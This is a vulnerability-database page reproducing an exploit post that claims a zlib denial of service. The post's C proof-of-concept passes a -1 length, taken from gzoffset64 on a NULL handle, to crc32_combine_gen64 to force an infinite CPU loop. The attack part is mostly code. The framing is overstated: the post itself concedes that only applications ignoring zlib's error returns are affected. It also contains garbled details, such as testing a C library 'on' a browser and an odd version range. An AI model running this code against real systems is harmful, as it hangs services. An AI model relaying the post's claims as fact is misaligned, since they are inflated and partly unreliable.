Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 zlib crc32_combine_gen64 Denial of Service

🗓️ 26 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 103 Views

Zlib DoS through infinite loop in crc32_combine_gen64 from invalid length (-1) causing 100% CPU.

Code
=============================================================================================================================================
    | # Title     : zlib via Infinite Loop in crc32_combine_gen64 Denial of Service                                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://github.com/madler/zlib                                                                                              |
    =============================================================================================================================================
    
    [+] Summary    :  A vulnerability in zlib affected from 0 before 1.3.2  can lead to a Denial of Service (DoS) condition due to an infinite loop in the crc32_combine_gen64() function.
    
    The issue occurs when an invalid length value (specifically -1, interpreted as 0xFFFFFFFFFFFFFFFF in unsigned 64-bit form) is passed to the function. This can happen if a program:
    
    Calls gzopen() with invalid parameters.
    
    Fails to properly validate the returned gzFile pointer.
    
    Calls gzoffset64() on a NULL pointer.
    
    Passes the resulting invalid length to crc32_combine_gen64().
    
    When this malformed value is processed, the internal bitwise loop logic in crc32_combine_gen64() fails to terminate, resulting in 100% CPU consumption and an infinite loop.
    
    This vulnerability does not allow remote code execution or privilege escalation. The impact is limited to resource exhaustion (CPU) within applications that improperly validate zlib function return values.
    
    [+] POC   : 
    
    #include <zlib.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    void create_dummy_file(const char* filename) {
        FILE *fp = fopen(filename, "w");
        if (!fp) {
            perror("Failed to create file");
            exit(1);
        }
        fprintf(fp, "This is a test file for the vulnerability exploit");
        fclose(fp);
        printf("[+] Test file created: %s\n", filename);
    }
    
    int main(int argc, char *argv[]) {
        const char *target_file = "poc_test.gz";
        
        printf("========================================\n");
        printf("    zlib Exploit by indoushka       \n");
        printf("    DoS via Infinite Loop in crc32_combine_gen64\n");
        printf("========================================\n\n");
    
        create_dummy_file(target_file);
    
        printf("[*] Attempting to open the file incorrectly...\n");
        gzFile file = gzopen(target_file, "");
        
        if (file == NULL) {
            printf("[OK] Success: gzopen returned NULL as expected\n");
        } else {
            printf("[!] Failure: gzopen did not return NULL (unexpected)\n");
            gzclose(file);
            return 1;
        }
    
        printf("[*] Calling gzoffset64 on a NULL pointer...\n");
        z_off64_t malicious_len = gzoffset64(file);
        
        printf("[*] Value returned from gzoffset64: %lld (0x%llx)\n", 
               (long long)malicious_len, (unsigned long long)malicious_len);
        
        if (malicious_len == (z_off64_t)-1) {
            printf("[OK] Success: Obtained value -1 (0xFFFFFFFFFFFFFFFF)\n");
        }
        printf("\n[!] Calling crc32_combine_gen64 with the poisoned value...\n");
        printf("[!] This will cause the program to enter an infinite loop!\n");
        printf("[!] CPU consumption starts now... Press Ctrl+C to stop\n");
        printf("----------------------------------------\n");
      
        uLong result = crc32_combine_gen64(malicious_len);
    
        printf("CRC Result: %lu\n", result);
        gzclose(file);
        remove(target_file);
        
        return 0;
    }
    
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
zlibcrc32 combineinfinite loopinvalid lengthdenial of service
103